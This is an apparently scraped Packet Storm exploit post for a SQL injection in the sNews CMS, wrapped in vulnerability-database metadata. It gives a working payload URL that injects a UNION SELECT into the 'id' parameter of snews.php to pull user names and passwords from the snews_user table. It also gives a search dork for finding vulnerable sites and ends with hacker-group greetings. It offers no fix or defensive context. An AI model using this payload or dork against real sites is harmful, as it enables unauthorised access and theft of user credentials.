ID PACKETSTORM:119573
Type packetstorm
Reporter By onestree
Modified 2013-01-15T00:00:00
Description
`
____ ____ ____ _______/ |________ ____ ____
/ _ \ / \_/ __ \ / ___/\ __\_ __ \_/ __ \_/ __ \
( <_> ) | \ ___/ \___ \ | | | | \/\ ___/\ ___/
\____/|___| /\___ >____ > |_ | |__| \___ >\___ >
\/ \/ \/ \/ \/
# Exploit Title : CMS snews SQL Injection Vulnerability
# Author : By onestree
# Software Link : http://snewscms.com/
# tested : ubuntu 12.10 / win 7
# Dork : inurl:"tanyakan pada rumput yang bergoyang"
*************************************************************
SQL poc:
http://localhost/snews/snews.php?act=shownews&id=[SQL]
Example:
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
Thanks :
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder
spesial my hunny :*
`
{"sourceHref": "https://packetstormsecurity.com/files/download/119573/cmssnews-sql.txt", "sourceData": "` \n \n____ ____ ____ _______/ |________ ____ ____ \n/ _ \\ / \\_/ __ \\ / ___/\\ __\\_ __ \\_/ __ \\_/ __ \\ \n( <_> ) | \\ ___/ \\___ \\ | | | | \\/\\ ___/\\ ___/ \n\\____/|___| /\\___ >____ > |_ | |__| \\___ >\\___ > \n\\/ \\/ \\/ \\/ \\/ \n \n \n# Exploit Title : CMS snews SQL Injection Vulnerability \n# Author : By onestree \n# Software Link : http://snewscms.com/ \n# tested : ubuntu 12.10 / win 7 \n# Dork : inurl:\"tanyakan pada rumput yang bergoyang\" \n \n \n************************************************************* \n \nSQL poc: \n \nhttp://localhost/snews/snews.php?act=shownews&id=[SQL] \n \nExample: \n \nhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* \n \n \nThanks : \n \nExploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell \n \nindonesiancoder - moeslimh4x0r - go-coder \n \nspesial my hunny :* \n`\n", "edition": 1, "references": [], "modified": "2013-01-15T00:00:00", "hash": "280d426cab4da0bc9e03b6c290d8846032a4dbb8b883a24ca5e7c9fbc2ed7b08", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/119573/Snews-CMS-SQL-Injection.html", "description": "", "id": "PACKETSTORM:119573", "reporter": "By onestree", "lastseen": "2016-11-03T10:16:28", "published": "2013-01-15T00:00:00", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "Snews CMS SQL Injection", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "9dff942b56f4542ceed78dc8bfd9cc66", "key": "href"}, {"hash": "4fe7dc76b88259d2e72ed2c00f85eeae", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "4fe7dc76b88259d2e72ed2c00f85eeae", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d1d49769a134b0c492751349b107673f", "key": "reporter"}, {"hash": "74786401f71ef579b62bdbc65f8c8f80", "key": "sourceData"}, {"hash": "61aba19537d747335e05bb7f0f0ceb95", "key": "sourceHref"}, {"hash": "36c91ed2ce27411879242c74d64f5652", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}
{}
